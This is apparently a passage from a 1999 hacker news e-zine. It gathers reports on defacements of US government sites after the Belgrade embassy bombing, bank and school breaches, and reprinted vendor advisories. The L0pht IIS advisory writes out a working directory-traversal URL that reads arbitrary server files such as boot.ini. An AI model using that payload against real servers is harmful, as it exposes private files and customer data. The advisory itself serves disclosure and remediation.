In response to the recent NATO bombing of the Chinese embassy in Belgrade some people have started
attacking web sites. The US Embassy in China, The DOE, and the Department of Interior are a few of
the web sites that have had their web pages changed as a direct result of the bombings. Most of
the slogans posted on the pages are extremely anti USA and NATO and and evoke Chinese nationalism
and patriotism.
ABC News
http://www.abcnews.go.com/go/sections/world/DailyNews/kosovo_chinacyber_990509.html
Protests Reach Cyberspace
By Stacy Lu -- ABCNEWS.com
May 9, 7:51am PT � Protests over NATO�s bombing of the Chinese embassy in Belgrade have spilled into
cyberspace.
Enraged hackers apparently attacked the official Web site of the U.S. embassy in China yesterday, took
over the Web sites of the Departments of Energy and the Interior today, and established their own online
convention center at a site called �killusa.�
As a result, the Department of Interior Web site on Sunday displayed pictures of the Chinese journalists
killed on Saturday after NATO accidentally bombed the Chinese embassy in Belgrade. The Department of
Energy site read �Protest USA�s Nazi action.�
It was unclear whether the hacking was done by Chinese or not, though several messages on Chinese
Web sites and message boards based in China claimed that it was.
According to Chinese news reports, hackers also launched attacks on the official White House site,
which features an automated restoration function set to operate within five seconds of an attack.
The messages posted on attacked sites were vitriolic, patriotic and, in some cases, poetic.
One read �Down with the Yanks. The fate of the Chinese people has reached the most critical point� � a
play upon the lyrics of the Chinese national anthem, reflecting a similar patriotic call after the Japanese
invaded China in 1937.
A poem was posted that has appeared before other civilian unrests in China such, particularly in 1976
after the death of Premier Zhou Enlai. A rough translation: �I grieve while the wolves howl/I cry while the
beasts cheer/I shower the martyrs with my tears while unsheathing the sword.�
Communist slogans also appeared, a rarity in today�s China. One of the hacked sites declared �This hill
has been taken over by the commies.�
Message Boards Overflowing
Bulletin boards based in China were full of messages condemning the U.S. and NATO�s mistaken bombing
of the Chinese embassy.
�You think you have a strong army without human nature and a great number of brazen politicians just
like you ... pose as the world cop and think the world must run under your rules, your human rights, your
democracy," one message read.
The Department of Energy�s home page also had a message that read, �We are Chinese hackers that
takes no cares about politics, but we can not stand by seeing our Chinese reporters been killed.�
The hackers� own site at killusa.abc.yesite.com, a repository of hacking strategies, had nearly 1,000
messages Sunday, either reporting sites being hacked or expressing anti-American sentiments.
Rumors flew thick and fast, among them that NATO had again bombed the Chinese embassy in
Belgrade and that Chinese President Jiang Zemin had said that China must be prepared to go to war.
Another stated that the intelligence reports provided to NATO prior to the embassy bombing were supplied
by a NATO officer angry with China over its treatment of Tibet.
A contributor to the page also suggests manning a full-scale attack on American Web sites,
disseminating computer viruses, and attacking the sites continuously in a method the hackers term
�machine-gunning.� Another suggests targeting financial sites.
Copyright 1999 ABC News Internet Ventures
-=-
Washington Post;
[Moderator: Mirrors of these hacks can all be found at
http://www.attrition.org/mirror/attrition]
http://www.washingtonpost.com/wp-srv/inatl/longterm/balkans/stories/hackers051299.htm
Anti-NATO Hackers Sabotage 3 Web Sites
By Stephen Barr
Washington Post Staff Writer
Wednesday, May 12, 1999; Page A25
Computer hackers protesting NATO's bombing of the Chinese Embassy in
Belgrade sabotaged three U.S. government Web sites, Clinton administration
officials said yesterday.
The hackers placed anti-NATO messages on Web pages operated by the Energy
Department, the Interior Department and one Interior bureau, the National
Park Service. The cyber-attacks late Sunday forced the Energy Department
and the Park Service to shut down their home pages for much of Monday.
The Interior Department hacker "was traced back to China by DOI computer
experts," said Interior spokesman Tim Ahearn. "The FBI is looking into it
now."
Energy spokeswoman Michelle Del Valle said, "We don't know who did it,"
but she noted that "the hackers claimed in a message that they were
Chinese." She said the DOE has started an investigation.
The officials said the Web pages were pulled off line quickly after the
sabotage was discovered. Electronic firewalls protected other parts of the
departmental computer systems from attack, they said.
Del Valle said hackers placed the following message, with parts in
imperfect English, on the DOE's site:
"Protest U.S.A.'s Nazi action! Protest NATO's brutal action! We are
Chinese hackers who take no cares about politics. But we can not stand by
seeing our Chinese reporters been killed which you might have know.
Whatever the purpose is, NATO led by U.S.A. must take abosolute
responsibility. You have owed Chinese people a bloody debt which you must
pay for. We won't stop attacking until the war stops!"
NATO bombed the Chinese Embassy in Belgrade on Saturday, killing three
people, including at least one journalist. U.S. and NATO officials said
the bombing was an accident caused by reliance on an outdated map.
At Interior, Ahearn said hackers sabotaged the home page about 10 p.m.
Sunday, replacing photographs and information with "pictures of Asian
people and Chinese writing." It took about five hours to take the page off
the Web, restore data and bring it back on line.
Another federal Web site � Recreation.gov � was hit April 30 and was down
until May 3, Ahearn said.
The White House Web site was shut down Monday night after attempts were
made Monday morning to hack into the system. White House spokesman Barry
Toiv said it was shut down through last night to try to determine whether
hackers tampered with the White House computer system. Toiv said he did
not know who was responsible.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
05.0 "The Egg" `Cracked'.
~~~~~~~~~~~~~~~~~~~~
The Egg, Cracked
From HNN http://www.hackernews.com/
contributed by Code Kid
A UK internet savings bank known as the Egg, owned by Prudential, was the victim of a security flaw that
allowed some users to see other users confidential financial information. The article goes on to explain a
classic example of poor implementation. Just because they use encryption does not mean that they are
secure. The bank claims that they have solved the problem.
BBC
http://news.bbc.co.uk/hi/english/business/the_company_file/newsid_337000/337975.stm
Business: The Company File
Crack in Egg's security
It's security, but not as you'd want it
UK Internet savings bank Egg, owned by Prudential, has rushed to close a security flaw that allowed some users
to see other potential savers' confidential financial information.
Egg did not make the security flaw public, but BBC News Online was alerted to the problem by two of its
readers.
One of them called the lack of security "very worrying".
New site with flaws
The fault developed 10 days ago when Egg moved its operations fully to the Internet and relaunched its
Website with new technology.
Several people who tried to apply online for an Egg account, suddenly saw somebody else's application
flash up on the screen - including confidential information like home address, phone numbers, e-mail address,
the amount of money to be invested and other details.
Two shocked customers alerted Egg to the problem, whose IT team then desperately tried to track down the
fault.
Peter Marsden, IT director at Egg, told BBC News Online that the flaw was corrected during the afternoon of
the same day.
Encryption breaches security
Ironically, the problem was triggered by Egg's own security measures. People who try to apply for
an Egg account are asked to log on to the system by identifying themselves with their e-mail address and a
password.
This information is then encrypted and used to 'log the session', i.e. make sure that the computer makes the
right connection between the Internet user and its own electronic records.
However, the new system was not configured to cope with long e-mail addresses. Every e-mail address longer
than about 30 letters was automatically truncated.
Because of the encryption process, people with long, albeit very different e-mail addresses, could end up with
identical IDs.
The flaw became apparent when, for example, mandatory sections in the application form were not filled
in correctly and Egg's web server sent back the page demanding additional information.
At this point, a page containing confidential information could be sent to somebody else with the identical ID.
If hackers had been aware of the security flaw, they could have deliberately flooded Egg's servers, identifying
themselves with long, but false e-mail addresses, hoping to glean personal information of Egg customers.
Egg has now ironed out the problem and changed the system so it can cope with e-mail addresses of any
length.
Online, and growing
The Egg savings account has been a phenomenal success, exceeding the wildest expectations of parent
company Prudential.
Within six months the company managed to reach its five-year target, with 500,000 customers who have put
�5bn in its accounts.
To help its customers to get online, the Egg has launched a free Internet access service, similar to
Dixon's succesful Freeserve.
However, the success has come at a price. The Egg venture is losing millions, and Prudential does not
expect it to make money for some years.
@HWA
06.0 Student changes grades
~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Student Changes Grades
contributed by Weld Pond
An unidentified student of Douglas County High School has admitted to breaking into the schools
computer system and changing the grades of four students. Sgt. Attila Denes, spokesman for the
Douglas County sheriff called their technique "ingenious". Of course the article does not give
any technical details. The student has been suspended for 10 days, may face expulsion and criminal
charges including forgery, use of forged academic records and criminal tampering.
Inside Denver
http://insidedenver.com/news/0507hack1.shtml
Boy admits altering Douglas High grades
By Tillie Fong
Denver Rocky Mountain News Staff Writer
CASTLE ROCK -- Four Douglas County High School students decided
last month they could hack their way into better grades, authorities said
Thursday.
One 16-year-old boy broke into the school's record system and raised
some low marks.
"The technique they used was ingenious," said Sgt. Attila Denes,
spokesman for the Douglas County sheriff.
The hacker figured out a way to get access to records via the school's
library computer and fax machine. He also used commercially available
software to obtain the password.
The boy apparently got into the system at least 30 times starting in
mid-April.
"He changed an average of two to three grades for each student and
changed the failing or near failing grades to A's and B's," Denes said.
On April 30, school employee Joan Elderton noticed that several changes
were made to four students' grades without authorization, and notified
assistant principal Ron England.
Bruce Caughey, spokesman for Douglas County schools, said one of the
things that gave the hacker away was the time and date log the computer
system keeps.
"School officials were able to determine when the changes were made," he
said.
That same day, administrators called in the hacker and his father.
"The student initially denied everything," Denes said.
But the following Monday, he submitted a letter to school officials in which
he admitted making the changes and described how he did it.
At that time, he also said he had altered the grades for three other
students.
"The school administrator subsequently talked to the other three boys, and
they each said that they had asked this other boy to change the grades on
their behalf," Denes said.
Since then, the hacker has been suspended for 10 days, and the other
three students for five days.
They also face criminal charges, and possible expulsion.
Possible charges against the hacker include forgery, use of forged
academic records and criminal tampering.
The other three boys are looking at criminal solicitation and use of forged
academic records charges. None of the boys was named because of their
age.
"The students showed quite a bit of resourcefulness," said Denes. "It's too
bad it couldn't have been channeled more positively."
May 7, 1999
@HWA
07.0 IBM's Gift To Australia's Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
IBMs Gift to Australias Security
contributed by photon
It is hard to tell if it is the person being written about or the reporter doing the writing but
this "news article" makes it seem that Guy Denton was sent from IBM to save all of Australia from
cyber attacks. A prime example of sensationalistic advertising hiding as "news".
The Sydney Morning Herald
http://www.smh.com.au/news/9905/08/text/national4.html
Hacker tracker plays a risky game
Date: 08/05/99
By JAMES WOODFORD, Science Writer
Guy Denton is the hackers' policeman, the keeper of knowledge so central to our society that should he
change sides he would be one of the most dangerous men on Earth.
His job is to enter other people's computer systems, detect the presence of illegal hackers, prevent
systems from being attacked and to slowly - when students have proven they can be trusted - teach a new
generation of "ethical" hackers how to hunt down bad guys in cyberspace.
An ethical hacker is a computer expert who legally enters clients' computer systems searching for chinks
in security.
Mr Denton said hacking is the "getting of any information that you do not have the right to see".
It is also the wreaking of havoc within computer systems by entering and changing codes so that a company
or bureaucracy's business is disrupted.
Mr Denton, 40, an American, is in Australia to take a new crop of IBM recruits to higher levels of
anti-hacking skills.
The company searches for talented university graduates with the right skills to become professional
ethical hackers with the right psychological makeup to ensure that the skills they are taught are not
misused. Mr Peter Watson, an ethical hacker also with IBM, said: "We tend to stay away from people who
hold themselves out as hackers.
"But we look for certain personality traits - puzzle-solving ability, inquisitiveness - people who are
not comfortable until they have been all the way through something.
"They are people who have got to have the full picture."
They are also young - most, said Mr Watson, were in their mid-20s.
"If you look back through history we have always had things like the Silk Road," Mr Watson said. "They were
always exposed to bandits and pirates and you are really just seeing our trade routes moved to an electronic
basis.
"We are the security guards of the Internet."
The Australian team of ethical hackers - their numbers are a closely guarded secret - work out of a darkened
room on Sydney's Lower North Shore with a bank of computers from where just about any computer system in the
world can be accessed.
Companies concerned about the security of their systems pay a fee of between $15,000 and $40,000 plus costs
to allow the ethical hackers to break into their network.
"In some circumstances they don't tell their computer system administrators that there is a hack going on,"
Mr Denton said.
Once the ethical hackers have entered the system they then wait to see how long it takes for their presence
to be detected or whether once it is detected proper
procedures are followed.
If the "attack" is not detected at all, then advice is given to the client on the installation of a "warning
intrusion alarm system" or an upgrading of security.
"The level of activity is occurring a lot more," Mr Watson said. "We are starting to see a lot of activity."
Until recently most hacking activity in Australia tended to take place after hours, when people had left work
or university students had finished their day's study.
However, as more people from overseas are realising that Australia is a promising hacking target, the
intrusions are occurring more on a 24-hour basis as people dial
in from places like the United States.
Hackers are able to access a company's computer system by calling in externally and then using programs to
actually enter the systems.
Advice on how to enter computer systems is readily available on the Internet and magazines give tips on how
to enter various systems. Computer hacking programs are also now being sold illegally.
However, in spite of the increasing sophistication being employed by hackers, by far the biggest volume of
intrusions are what are described as "script kiddies".
The greatest fear for the ethical hacker is the anonymous computer whiz or somebody hell bent on mischief
working from within.
"A rogue employee typically does not make themselves known," said Mr Denton.
The ethical hackers acknowledge that their work gives them the power to cause huge problems for society and
have to work ensuring that the staff they train do not cross the line to illegality.
"I could cause a huge amount of chaos," Mr Denton said. "But I am not going to do that.
"We have to be sure that our guys are not going to get bored and do things they are not supposed to do."
@HWA
08.0 SCREAM busted
~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by scream
SCREAM Busted
Last Friday HNN reported that S C R E A M a member of H.A.R.P (Hackers Against Racist
Parties) and well known for his fight against racism and fascism had been apprehended by
law enforcement. HNN has received confirmation of this earlier report. The FBI questioned
SCREAM for 27 hours about 26 different security breaches and his ethics on hate-groups. It
is unknown if he has been charged with a crime.
@HWA
09.0 Corel Hacked
~~~~~~~~~~~~
From http://www.net-security.org/
COREL HACKED
by BHZ, Tuesday 11th May 1999 on 5:10 pm CET
Several of Corel domains have been compromised by Team Sploit. Hackers convict
NATO attack on Chinese embassy in Belgrade. "whew. when i heard the news about
NATO bombing the Chinese embassy in Serbia, i thought heaven was falling down...
^Oh, sorry, it was a mistake", was the explanation we heard from NATO
spokesmen^". See archive of www.corel.com below
http://www.net-security.org/spec/hack/corel.com.htm
@HWA
10.0 G0at Security calls it quits
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
G0AT QUITS
by BHZ, Tuesday 11th May 1999 on 2:58 pm CET
G0at security is officially finished. They had some problems (including wiping of their
server, fights between members, taking of their EffNet channel #feed-the-goats...).
Their earlier hacks are stored on Attrition mirror. Read finishing statement by Debris
below
///////////////////////////////////////////
GGGGGG OOOOOOO AAAAAAAA TTTTTTTTTT
G O O A A TT
G GGG O O AAAAAAAA TT
G G O O A A TT
GGGGGG OOOOOOO A A TT
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Due to recent events, the downfall of g0at security has become imminent.
These incidents include:
- Legal problems of some of our members.
- Recent hacking crack downs launched by many governments.
- The recent takeover of our channel, #feed-the-goats (Efnet).
- Losing our server due to a sloppy hack by one of our members (/me looks away).
- Losing our text files due to our domain being wiped off the server.
- Fights and dissapearances of some of our members.
- The maturing of our members.
g0at security hereby announces it's closure. By this we do not mean we are going legit,
we are finished. Unlike other groups we most likely will not spawn back.
[Brief history of g0at security]
One day in Feb. I believe, ech0 and myself (Debris), decided to irc. ech0 informed me that
occasionally hung out in a channel he, himself created called #feed-the-goats. From there,
members of a popular group, HcV along with members of Global Hell, began coming. ech0 and
myself decided that we wanted to be as elite as our peers in #rootworm, so we made a webpage.
The purpose of the page was to mock and satirize hacker culture in general. Our first document
entitled "g0at declares war on LoU" mocked the Legion of the Underground's new attempt at
becoming legit among a handful of other aspects of their organization.
Our original url (goat.sphix.com) quickly grew in size and popularity, and our channel became
more populated. The hacks began soon after, some by members and a lot by non-members. g0at's
highpoint came soon after the controversial yahoo hack. Our popularity skyrocketted and the
name g0at became known to all (unfortunatly we got all the l33t0s in our channel and wouldn't
go away). The fun and games continued up until April, when all the 'incidents' began. Then
May was the last straw.
[Where do we go from here]
Most members will most likely go their own ways. Many still hang in #feed-the-goatz (our new
channel). No more text releases will come from g0at, our webpage will remain down, our archive
on attrition.org will stay the same and nothing will be heard of us as a group.
[Thanks and greets]
Thanks to all that supported our group and enjoyed the text we wrote to amuse the unintelligent.
Greets to all our 12 members, HNN, attrition, net-security, HWA.hax0r.news. JP, for entertaining
us for hours with your hacker journalism. And thanks to all the rest.
Finally.... it's been fun. It's been awesome being associated with g0at.
You can still reach us at g0at@attrition.org for further questions or comments or whatever (I just want email)
g0at---------------------------------------------------------------------------------------------
[]=Debris=[]
debris@attrition.org
@HWA
11.0 Guninski uncovers yet another browser bug
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
ANOTHER BROWSER VULNERABILITY
by BHZ, Tuesday 11th May 1999 on 2:52 pm CET
Georgi Guninski reports another browser bug to BugTraq: "There is a design flaw in
both Internet Explorer 5.0 and Netscape Communicator 4.51 Win95 (guess all 4.x
versions of both browsers are vulnerable too) in the way they handle bookmarks. The
problem arises if the user bookmarks (adds to favorites) and later chooses a specially
designed javascript: URL. When the bookmark is chosen later, the JavaScript code in
it is executed in the context (the same domain and protocol) of the document opened
prior to choosing the bookmark. So, the JavaScript code has access to documents in
the same domain. An interesting case is choosing the bookmark when the active
document is a local file (the protocol is "file:") - then the JavaScript code has access
to local files and directories".
@HWA
12.0 Freaky to do a Macintosh related speech at Defcon7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
FREAKY'S DEFCON7 SPEACH
by LucasAr, Tuesday 11th May 1999 on 2:30 pm CET
As you probably know Freaky will be giving a first time ever Macintosh security
related speech on DEFCON7. You can read his announcement and the topics he
plans to address below, and I urge you to visit Freaks Macintosh Archives.
http://freaky.staticusers.net/
Freaks Macintosh Archives Author Freaky will be speaking at this years Hacker Convention
located in Las Vegas, NV called DefCon 7 <www.defcon.org>
This is the first speach of its kind dealing with the MacOS and its security. We plan on
covering the following topics:
Macintosh Security Products:
OnGuard, FileGuard, Screen 2 Screen, FoolProof, AtEase
Macintosh Underground Products:
Such as programs to destruct a security product or cause another computer to crash (Denial of
Service Attack)
We will also cover how macs are vulnerable to DoS attacks.
And release new programs for the Mac Platforms.
Freaks Macintosh Archives
http://freaky.staticusers.net/
@HWA
13.0 IIS 2.0 "Security" by p0lix
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Originally posted on http://www.403-security.org/
IIS 2.0 "Security"
Microsoft is wrestling with security holes in its Site Server and Internet Information Server (IIS)
products that expose system files -- including potentially sensitive Internet-commerce customer
files or databases -- through any remote web browser.
The flaws, discovered by members of l0pht are caused from default configurations that install three
active server pages without proper access control list settings.
LOpht has warned that E-commerce server information -- including transaction logs, credit card
numbers, and other customer information -- are potentially at risk.
"There is even E-commerce shopping cart software that stores administrative passwords in simple
text files," LOpht warned.
Using these active server pages -- viewcode.asp, codebrws.asp, and showcode.asp -- someone could
view sensitive or compromising information from that system. The problem affects Versions 3.x of
Site Server and 4.x of IIS; both are used in E-commerce infrastructures.
It's bad if you've got an e-commerce database installed on that system, because almost anyone can
use Active Server Pages to locate databases and get into database information, and you can also
view the source code of HTML pages.
A WebTrends engineer found that the holes were so wide he could use them on an Internet search
engine and determine what servers were similarly configured.
He was able to view the parameters of any file and you can get information that will lead you
through all the systems throughout the network.
Microsoft officials were working on new versions of the tools to correct the vulnerability, which
security product manager Scott Culp said should be complete by early next week, and planned to
issue a security bulletin on the issues Friday afternoon.
In the meantime, potential workarounds include checking the Active Server Pages settings, or
deleting the tools altogether.
As a Web site operator, you want to give customers the opportunity to look at the code on their
page, however, this vulnerability allows somebody to misuse these tools to possibly look at other
files on the server.
For more information visit the l0pht web site at http://www.l0pht.com
-p0liX (p0lix@403-security.org)
@HWA
14.0 l0pht Security Advisory on MS IIS 4.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
L0pht Security Advisory
-------------
URL Origin: http://www.l0pht.com/advisories.html
Release Date: May 7th, 1999
Application: Microsoft IIS 4.0 Web Server
Severity: Web users can view ASP source code and other sensitive
files on the web server
Author: weld@l0pht.com
Operating Sys: Microsoft NT Server 4.0
--------------
I. Description
Internet Information Server (IIS) 4.0 ships with a set of sample files
to help web developers learn about Active Server Pages (ASP). One of
these sample files, showcode.asp, is designed to view the source
code of the sample applications via a web browser. The showcode.asp
file does inadequate security checking and allows anyone with a web
browser to view the contents of any text file on the web server. This
includes files that are outside of the document root of the web
server.
Many ecommerce web servers store transaction logs and other customer
information such as credit card numbers, shipping addresses, and
purchase information in text files on the web server. This is the
type of data that could be accessed with this vulnerability.
The L0pht would like to thank Parcens for doing the initial research on
this problem.
II. Details
The showcode.asp file is installed by default at the URL:
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp
It takes 1 argument in the URL, which is the file to view. The format of
this argument is:
source=/path/filename
So to view the contents of the showcode.asp file itself the URL would be:
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp
This looks like a fairly dangerous sample file. It can view the contents
of files on the system. The author of the ASP file added a security check
to only allow the viewing of the sample files which were in the '/msadc'
directory on the system. The problem is the security check does not test
for the '..' characters within the URL. The only checking done is if the
URL contains the string '/msadc/'. This allows URLs to be created that
view, not only files outside of the samples directory, but files anywhere
on the entire file system that the web server's document root is on.
For example, a URL that will view the contents of the boot.ini file, which
is in the root directory of an NT system is:
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini
This URL requires that IIS 4.0 was installed in its default location.
III. Solution
For production servers, sample files should never be installed so delete
the entire /msadc/samples directory. If you must have the showcode.asp
capability on development servers the showcode.asp file should be modified
to test for URLs with '..' in them and deny those requests.
For specific questions about this advisory, please contact
weld@l0pht.com
---------------
For more L0pht (that's L - zero - P - H - T) advisories check out:
http://www.l0pht.com/advisories.html
---------------
@HWA
15.0 X-Force Security advisory on Oracle 8: Multiple file system vulnerabilties
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ISS Security Advisory
May 6, 1999
Multiple File System Vulnerabilities in Oracle 8
Synopsis:
Internet Security Systems (ISS) X-Force has discovered that multiple
vulnerabilities exist in Oracle 8 that may allow local attackers to exploit
weaknesses in Oracle administrative tools. Oracle is the market leader in
enterprise database solutions. Attackers may use these vulnerabilities to
amplify their privilege to that of the 'oracle' user. By default, the
oracle user controls the entire Oracle database system. Attackers may
launch local denial of service attacks against the database as well as alter
or manipulate data.
Affected Versions:
ISS X-Force has determined that most current versions of Oracle 8 for Unix
are vulnerable. These versions include 8.03, 8.04, 8.05, and 8.15. Oracle
8 for Windows NT is not affected by these vulnerabilities.
Description:
The Oracle 8 distribution is shipped with many administrative utilities that
are owned by the oracle user with the setuid bit enabled. Several of these
utilities implement insecure file creation and manipulation. These
utilities also trust Oracle-related environment variables. The combined
effect of these vulnerabilities may allow local attackers to create, append
to, or overwrite privileged oracle files. Certain vulnerabilities exist
that may allow local attackers to execute arbitrary commands as the oracle
user. Attackers may also be able to permanently elevate their privilege to
that of the oracle user.
Temporary files that follow symbolic links are a common source of
vulnerabilities in setuid executables. Administrators should remove or
restrict access to setuid executables if possible.
Developers of setuid programs need to take special precautions to prevent
the introduction of vulnerabilities of this nature. ISS X-Force recommends
that all Unix developers become familiar with Matt Bishop's secure
programming guide, available at
http://olympus.cs.ucdavis.edu/~bishop/secprog.html
Fix Information:
ISS X-Force has worked with Oracle to provide a patch for the
vulnerabilities described in this advisory. Oracle has provided the
following FAQ to answer any questions concerning these vulnerabilities.
Q: I've heard about a setuid security issue with the Oracle database? What
is this all about?
A: On Unix platforms, some executable files have the setuid bit on. It may
be possible for a very knowledgeable user to use these executables to bypass
your system security by elevating their operating system privileges to that
of the Oracle user.
Q: Which releases are affected by this problem?
A: This problem affects Oracle data server releases 8.03, 8.0.4, 8.0.5, and
8.1.5 on Unix platforms only.
Q: Can I correct this problem or do I need a patch?
A: This problem can easily be corrected. The customer can download the patch
from the Oracle MetaLink webpages at http://www.oracle.com/support/elec_sup.
The patch is a Unix shell script. This shell script should be run
immediately, and also run after each relink of Oracle.
Q: What is Oracle doing to fix this problem?
A: Effective immediately, Oracle will provide the patch on Oracle's
Worldwide Support Web pages. Oracle will ensure the patches are incorporated
into future releases of Oracle8i (8.1.6) and Oracle8.0 (8.0.6)
Q: What is Oracle doing to notify users about this problem now?
A: Oracle is notifying all supported customers, via the Oracle Worldwide
Support Web pages, of this issue so they can address it as required.
ISS X-Force also recommends that all administrators complete a proactive
survey on the use or potential misuse of setuid bits on privileged
executables on their systems.
Credits:
These vulnerabilities were primarily researched by Dan Ingevaldson of the
ISS X-Force.
________
Copyright (c) 1999 by Internet Security Systems, Inc. Permission is
hereby granted for the electronic redistribution of this Security Alert.
It is not to be edited in any way without express consent of the X-Force.
If you wish to reprint the whole or any part of this Alert Summary in any
other medium excluding electronic medium, please e-mail xforce@iss.net for
permission.
About ISS
ISS is the pioneer and leading provider of adaptive network security
software delivering enterprise-wide information protection solutions. ISS'
award-winning SAFEsuite family of products enables information risk
management within intranet, extranet and electronic commerce environments.
By combining proactive vulnerability detection with real-time intrusion
detection and response, ISS' adaptive security approach creates a flexible
cycle of continuous security improvement, including security policy
implementation and enforcement. ISS SAFEsuite solutions strengthen the
security of existing systems and have dramatically improved the security
posture for organizations worldwide, making ISS a trusted security advisor
for firms in the Global 2000, 21 of the 25 largest U.S. commercial banks
and over 35 governmental agencies. For more information, call ISS at
678-443-6000 or 800-776-2362 or visit the ISS Web site at www.iss.net.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties with regard to this information. In no event shall the
author be liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any use of this
information is at the user's own risk.
X-Force PGP Key available at: http://www.iss.net/xforce/sensitive.html
as well as on MIT's PGP key server and PGP.com's key server.
Please send suggestions, updates, and comments to:
X-Force <xforce@iss.net> of Internet Security Systems, Inc.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv
iQCVAwUBNzLwJzRfJiV99eG9AQFDHwP/U4iParVoaPwPea8i+mXciMELGUDga2UM
Iyk6T6poQ9G3ASefs+v6Lm509xDeGCcPTi1MB7SvzUBb1vx95yOhu4M9CJHWOTCJ
3/ZlpV1Zdc7s/+N0ACxFNPozOmQvpT3OhbJKOakNQxDg3q/VbVXcJOxJ0DBKy7Xe
d0ehW7p2OqQ=
=6FXz
-----END PGP SIGNATURE-----
@HWA
16.0 Microsoft Security Bulletin: File viewers vulnerability (MS99-13)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
Microsoft Security Bulletin (MS99-013)
--------------------------------------
Solution Available for File Viewers Vulnerability
Originally Posted: May 7, 1999
Summary
=======
Microsoft has identified a vulnerability that occurs in some file viewers
that ship as part of Microsoft (r) Internet Information Server and Site
Server. The vulnerability could allow a web site visitor to view, but not to
change, files on the server, provided that they knew or guessed the name of
each file and had access rights to it based on Windows NT ACLs.
Microsoft is releasing this security bulletin to inform customers of the
vulnerability and enable them to eliminate it immediately. Patches are being
developed for the affected file viewers, and will be available shortly. When
they are available, an update to this security bulletin will be released.
Issue
=====
Microsoft Site Server and Internet Information Server include tools that
allow web site visitors to view selected files on the server. These are
installed by default under Site Server, but must be explicitly installed
under IIS. These tools are provided to allow users to view the source code
of sample files as a learning exercise, and are not intended to be deployed
on production web servers. The underlying problem in this vulnerability is
that the tools do not restrict which files a web site visitor can view.
It is important to note several important points:
- These file viewers are not installed by default under IIS.
They are only installed under IIS if the user chooses to install
the sample web files.
- This vulnerability only allows a web site visitor to view files.
There is no capability through this vulnerability to change files
or add files to the server.
- This vulnerability does not in any way bypass the Windows NT file
permission ACLs. A web site visitor could only use these tools to
view files whose ACLs allows them read access. The administrator of
the web server determines the specific permissions for all files on
the server.
- The viewers can only be used to view files on the same disk partition
as the currently-displayed web page. Databases such as those used by
e-commerce servers are typically stored on a different physical drive,
and these would not be at risk
- The web site visitor would need to know or guess the name of each file
they wished to view.
Specific steps that customers can take to immediately eliminate the
vulnerability are discussed below in What Customers Should Do. In addition,
Microsoft is developing updated versions of the file viewers and will
release them shortly.
While there are no reports of customers being adversely affected by this
vulnerability, Microsoft is proactively releasing this bulletin to allow
customers to take appropriate action to protect themselves against it.
Affected Software Versions
==========================
- Microsoft Site Server 3.0, which is included with Microsoft Site
Server 3.0 Commerce Edition, Microsoft Commercial Internet
System 2.0, and Microsoft BackOffice Server 4.0 and 4.5
- Microsoft Internet Information Server 4.0
What Microsoft is Doing
=======================
Microsoft has provided this bulletin to inform customers of specific steps
that they can take to immediately eliminate this vulnerability on their
servers. Microsoft is developing updated file viewers that fix the problem
identified, and will release an updated version of this bulletin when they
are available.
Microsoft also has sent this security bulletin to customers subscribing
to the Microsoft Product Security Notification Service. See
http://www.microsoft.com/security/services/bulletin.asp for more
information about this free customer service.
Microsoft has published the following Knowledge Base (KB) article on this
issue:
- Microsoft Knowledge Base (KB) article Q231368,
Solution Available for File Viewers Vulnerability,
http://support.microsoft.com/support/kb/articles/q231/3/68.asp.
(Note: It might take 24 hours from the original posting of this
bulletin for the KB article to be visible in the Web-based
Knowledge Base.)
What Customers Should Do
========================
Customers should take the following steps to eliminate the vulnerability on
their web servers:
- Unless the affected file viewers are specifically required on the
web site, they should be removed. The following file viewers are
affected: ViewCode.asp, ShowCode.asp, CodeBrws.asp and Winmsdp.exe.
Depending on the specific installation, not all of these files may
be present on a server. Likewise, there may be multiple copies of
some files, so customers should do a full search of their servers
to locate all copies.
- In accordance with standard security guidelines, file permissions
should always be set to enable web visitors to access only the files
they need, and no others. Moreover, files that are needed by web
visitors should provide the least privilege needed; for example,
files that web visitors need to be able to read but not write should
be set to read-only.
- As a general rule, sample files and vroots should always be deleted
from a web server prior to putting it into production. If they are
needed, file access permissions should be used to regulate access to
them as appropriate
More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-013,
Solution Available for File Viewers Vulnerability
(The Web-posted version of this bulletin),
http://www.microsoft.com/security/bulletins/ms99-013.asp.
- Microsoft Knowledge Base (KB) article Q231368,
Solution Available for File Viewers Vulnerability,
http://support.microsoft.com/support/kb/articles/q231/3/68.asp.
Obtaining Support on this Issue
===============================
If you require technical assistance with this issue, please contact
Microsoft Technical Support. For information on contacting Microsoft
Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.
Acknowledgments
===============
Microsoft acknowledges WebTrends (www.webtrends.com) for discovering this
vulnerability and reporting it to us.
Revisions
=========
- May 07, 1999: Bulletin Created.
For additional security-related information about Microsoft products, please
visit http://www.microsoft.com/security
